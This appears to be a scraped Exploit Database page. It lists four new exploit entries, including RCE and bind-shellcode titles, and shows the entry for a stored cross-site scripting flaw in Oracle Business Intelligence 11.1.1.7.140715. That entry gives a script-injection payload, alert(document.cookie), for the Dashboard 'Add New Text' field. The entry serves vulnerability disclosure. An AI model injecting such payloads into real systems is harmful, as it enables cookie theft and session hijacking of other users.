
4 changes to exploits/shellcodes ChurchRota 2.6.4 - RCE (Authenticated) Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution) Linux/x86 - Socat Bind Shellcode (113 bytes)
12 lines
No EOL
443 B
Text
12 lines
No EOL
443 B
Text
# Exploit Title: Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS
|
|
# Exploit Author: omurugur
|
|
# Vendor Homepage: https://www.oracle.com/security-alerts/cpujan2021.html
|
|
# Version: 11.1.1.7.140715
|
|
# Author Web: https://www.justsecnow.com
|
|
# Author Social: @omurugurrr
|
|
|
|
Stored XSS:
|
|
|
|
“;!—“”<script>alert(document.cookie);</script>=&{(alert(document.cokie))}
|
|
|
|
Vulnerable area = Dashboard - Add New Text |